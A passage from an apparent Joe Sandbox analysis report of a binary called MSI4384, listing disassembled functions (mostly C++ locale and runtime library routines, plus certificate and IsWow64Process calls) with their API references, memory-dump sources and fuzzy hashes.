                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004451FD
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • messages.LIBCPMT ref: 00445237
                                                                    • std::_Facet_Register.LIBCPMT ref: 0044524E
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0044526E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                    • String ID: :H
                                                                    • API String ID: 2750803064-3114238791
                                                                    • Opcode ID: d8542993b2a54e4e2e265cbc4cf1e86cda36a46dbb0f0aebe12842f5b9a1f0a0
                                                                    • Instruction ID: b3f3924e193657e54bffc2df0078187b3405a340d9ac172e14fb96f7a394afb7
                                                                    • Opcode Fuzzy Hash: d8542993b2a54e4e2e265cbc4cf1e86cda36a46dbb0f0aebe12842f5b9a1f0a0
                                                                    • Instruction Fuzzy Hash: D4010431900515EBDF04FFA5D8516AE7761BF44718F24441FE410AB392DF789E018B99
                                                                    Function 0043ABC4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043ABCB
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043ABD5
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0043AC0F
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AC26
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AC46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID: |:H
                                                                    • API String ID: 419941038-4278476797
                                                                    • Opcode ID: 37f8d1c1e22f5e09ce04b13579dc4fe36d4a25d8aa49e04213797bb081e143e0
                                                                    • Instruction ID: 059dcb1e9626028d8d29413bea33130447951fb3be63da3bb3c52f2fab808eb8
                                                                    • Opcode Fuzzy Hash: 37f8d1c1e22f5e09ce04b13579dc4fe36d4a25d8aa49e04213797bb081e143e0
                                                                    • Instruction Fuzzy Hash: 37010031A001299BCB09EFA5D8916AE7760BF88718F24541EE451AB381DF789E048B8E
                                                                    Function 0043AC59 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AC60
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AC6A
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0043ACA4
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043ACBB
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043ACDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID: X:H
                                                                    • API String ID: 419941038-3225465281
                                                                    • Opcode ID: 915bfaf567af9f8be4759e80e0146578b6263da929cca9730fdbb80c4be5cd20
                                                                    • Instruction ID: 65404657a34e0e39884d3255b9e355097d7ee0e1d318657bb5a9d9be23172623
                                                                    • Opcode Fuzzy Hash: 915bfaf567af9f8be4759e80e0146578b6263da929cca9730fdbb80c4be5cd20
                                                                    • Instruction Fuzzy Hash: 7A010031A001259BCB09EFA5D855AAE7760BF88B19F25141EF410AB3D1DF788A018B8A
                                                                    Function 0043ACEE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043ACF5
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043ACFF
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0043AD39
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AD50
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AD70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID: T:H
                                                                    • API String ID: 419941038-3378137253
                                                                    • Opcode ID: 8869110cdcfdc49ada707fcc179d8fc01a212d4f0c2eaf9dfe87bad1d9411436
                                                                    • Instruction ID: 814062be13c1ba9c7acbbe621dff30f314f1e9026378742bf13207a26966a6cd
                                                                    • Opcode Fuzzy Hash: 8869110cdcfdc49ada707fcc179d8fc01a212d4f0c2eaf9dfe87bad1d9411436
                                                                    • Instruction Fuzzy Hash: E60100319401259BCB08FFA5D841AAE7761BF88719F64051EE452AB391DF7C8E048B8A
                                                                    Function 0043AF42 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AF49
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AF53
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • numpunct.LIBCPMT ref: 0043AF8D
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AFA4
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AFC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                    • String ID: h:H
                                                                    • API String ID: 743221004-3828044881
                                                                    • Opcode ID: eb1c364e11cf809666610863fba97a39b5f41b8a0517e22856dddbae7e33b8a0
                                                                    • Instruction ID: 36924511c47a401f31c2ac3885715e98550525acfd46525a5b233acb2d0b703f
                                                                    • Opcode Fuzzy Hash: eb1c364e11cf809666610863fba97a39b5f41b8a0517e22856dddbae7e33b8a0
                                                                    • Instruction Fuzzy Hash: EF0104719001199BCB04FFA5D851AAE7764AF48718F21441FF410A7391DF7C8A048BCE
                                                                    Function 0045D551 Relevance: 9.3, APIs: 6, Instructions: 333COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3767a7d6d0192a2467eac590044d3ed76be4238a063b5c23c08e24abd260c763
                                                                    • Instruction ID: dabc00ba0ec7682ef2318b3014e6788cf4221f9d092716fb8490b24fb02806ee
                                                                    • Opcode Fuzzy Hash: 3767a7d6d0192a2467eac590044d3ed76be4238a063b5c23c08e24abd260c763
                                                                    • Instruction Fuzzy Hash: 70B16871D00355AFDB21DF24C881BEEBBA5EF19305F14416BEC14AB383D278A905CBA9
                                                                    Function 00422CD0 Relevance: 9.2, APIs: 6, Instructions: 220encryptionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00422D50
                                                                    • LocalFree.KERNEL32(?), ref: 00422DBA
                                                                    • LocalFree.KERNEL32(?), ref: 00422E24
                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00422F65
                                                                      • Part of subcall function 00423DC0: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000,F3E52339), ref: 00423E03
                                                                    • LocalFree.KERNEL32(?), ref: 00422F1B
                                                                    • CertFreeCertificateContext.CRYPT32(00000003,?), ref: 00422FAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Free$CertLocal$CertificateContext$#224NameString
                                                                    • String ID:
                                                                    • API String ID: 2751787804-0
                                                                    • Opcode ID: 6237d820bfa86cdf7a6fd4bb7f34f5858d98ba2037ec3d1adf7f1d5699dbffc6
                                                                    • Instruction ID: f985ae622feb80876e55a081d8fec6fe9136f88c09d3d33a1c36d379f907f807
                                                                    • Opcode Fuzzy Hash: 6237d820bfa86cdf7a6fd4bb7f34f5858d98ba2037ec3d1adf7f1d5699dbffc6
                                                                    • Instruction Fuzzy Hash: 3391C070E00259DFDB18CFA8D65879EBBB1FF44304F10461ED415AB391DBB8AA84CB94
                                                                    Function 0042B7F0 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042B81D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042B840
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042B868
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042B8DD
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042B911
                                                                    • LocalFree.KERNEL32 ref: 0042B9B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                    • String ID:
                                                                    • API String ID: 1378673503-0
                                                                    • Opcode ID: 3f4a7c087ebb1c10028f0d85ed490b1b2e7557e3edc644985a365a9c3a89b66a
                                                                    • Instruction ID: 001b51c90f6ee6af57e811fc135ab439bdaa64e07a730ed2617ac2b19bca78c7
                                                                    • Opcode Fuzzy Hash: 3f4a7c087ebb1c10028f0d85ed490b1b2e7557e3edc644985a365a9c3a89b66a
                                                                    • Instruction Fuzzy Hash: 1151E5B1901619DFDB10DF58E8407AEFBB4FB04724F14866EE864A7391D778AA00CBC9
                                                                    Function 00457CA4 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 373COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3509577899-3206640213
                                                                    • Opcode ID: 276c0fee8de7088265c8b09affb669beaf2516d9f372a1106c384f339e55b26b
                                                                    • Instruction ID: e5dd91ba740a7fbf77a21837fcd9218ba2f7d489cd4439ce345dac02cf228e5a
                                                                    • Opcode Fuzzy Hash: 276c0fee8de7088265c8b09affb669beaf2516d9f372a1106c384f339e55b26b
                                                                    • Instruction Fuzzy Hash: FFC1E671904201CADB249F699845ABB77B0FF45702F26406FEE01AB393DA3D8D4ECB59
                                                                    Function 0044CD4A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0044CD41,0044AC5C,0044A3E4), ref: 0044CD58
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0044CD66
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044CD7F
                                                                    • SetLastError.KERNEL32(00000000,0044CD41,0044AC5C,0044A3E4), ref: 0044CDD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 57d8cd83821044895310ff96d7b9366a17de62e8823e54e00e5329a9c4f0dfa7
                                                                    • Instruction ID: 7d71966c19c127f51efed73bfe9bdaa0a9b1c71b651ba415f1ee00ae24da0a29
                                                                    • Opcode Fuzzy Hash: 57d8cd83821044895310ff96d7b9366a17de62e8823e54e00e5329a9c4f0dfa7
                                                                    • Instruction Fuzzy Hash: 000124B390F2125EB76026B5BCC566B2E86EB02378734023FF210422F1EF991C05D66C
                                                                    Function 0043E033 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Mpunct$GetvalsH_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 2204710431-1686923651
                                                                    • Opcode ID: bd648d251b6cb647d5147228bfa42042242e4844a33b5ed83b629187698d16c5
                                                                    • Instruction ID: 34238db80c7f7ba61b8a6654e7dd9436b85daacd4455c753d4c5bc3d0d9932e8
                                                                    • Opcode Fuzzy Hash: bd648d251b6cb647d5147228bfa42042242e4844a33b5ed83b629187698d16c5
                                                                    • Instruction Fuzzy Hash: F521D0B1900B56AEDB25DF76884076BBFF8AB0C304F04491FE498C7A82D778E605CB94
                                                                    Function 00428620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(F3E52339,F3E52339,?,?,00000000,0046BF91,000000FF), ref: 004286BB
                                                                      • Part of subcall function 004495A8: AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07), ref: 004495B3
                                                                      • Part of subcall function 004495A8: ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07,?,?,?,F3E52339), ref: 004495ED
                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00428680
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00428687
                                                                      • Part of subcall function 00449557: AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449561
                                                                      • Part of subcall function 00449557: ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449594
                                                                      • Part of subcall function 00449557: WakeAllConditionVariable.KERNEL32(00483B70,?,?,004226B7,00484714,0046EC90), ref: 0044959F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                    • String ID: IsWow64Process$kernel32
                                                                    • API String ID: 411948497-3789238822
                                                                    • Opcode ID: 4af76f13d7b880c61500b5a064845bd886073dd02900a7a88b524ae956f285d4
                                                                    • Instruction ID: 5a38b0d1313d0151eb3c7e320f4df08aabff2a8812dbbb094d57e0af83caedd6
                                                                    • Opcode Fuzzy Hash: 4af76f13d7b880c61500b5a064845bd886073dd02900a7a88b524ae956f285d4
                                                                    • Instruction Fuzzy Hash: 5521AE72A05615EFDB10CFA4ED05B9EB7B8E749720F50067FE81193390EB79A900CB99
                                                                    Function 00434047 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043404E
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00434058
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 004340A9
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004340C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: 8H
                                                                    • API String ID: 2854358121-2343166405
                                                                    • Opcode ID: a8ad2bab92e8df886482ccd8936c24c5ef9ddec80c556d025818f55b47407cf9
                                                                    • Instruction ID: 559f49102767833e01396850a7a2d8aba01ba5338e18c6badaf691855ea052d1
                                                                    • Opcode Fuzzy Hash: a8ad2bab92e8df886482ccd8936c24c5ef9ddec80c556d025818f55b47407cf9
                                                                    • Instruction Fuzzy Hash: 77010431E001169BCB08FFA5D8416AE77B5AF88718F24441FF5106B391DF789E048B89
                                                                    Function 0043B06C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043B073
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043B07D
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043B0CE
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043B0EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: \:H
                                                                    • API String ID: 2854358121-3343456541
                                                                    • Opcode ID: a13c6643c038d82ebea3a6480f4cb2f49860e6b9100bf96da10e4be4fb6c4393
                                                                    • Instruction ID: ee2324c2f96be39e41c16ba4772fbe1527e69a9766b1e17bb6ac9a5c52c9de11
                                                                    • Opcode Fuzzy Hash: a13c6643c038d82ebea3a6480f4cb2f49860e6b9100bf96da10e4be4fb6c4393
                                                                    • Instruction Fuzzy Hash: 88010431900115ABCB08EFA5D8956AF7775AF48718F20441EE520673C1DF788A048BC9
                                                                    Function 00445157 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0044515E
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00445168
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 004451B9
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004451D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: :H
                                                                    • API String ID: 2854358121-3114238791
                                                                    • Opcode ID: cacd985c1a8c34cec7f1d8209963c3c84415efd47c1529273c7e0204370fad9e
                                                                    • Instruction ID: 48473a18cef7e6d1fb9316857a3dee905d62e12f5ea9ad571d21a38da177b155
                                                                    • Opcode Fuzzy Hash: cacd985c1a8c34cec7f1d8209963c3c84415efd47c1529273c7e0204370fad9e
                                                                    • Instruction Fuzzy Hash: 6D01ED31D005259BDF04FFA59855AAEB771AF84718F20442EE410AB382DF789E04CB89
                                                                    Function 00445281 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00445288
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00445292
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
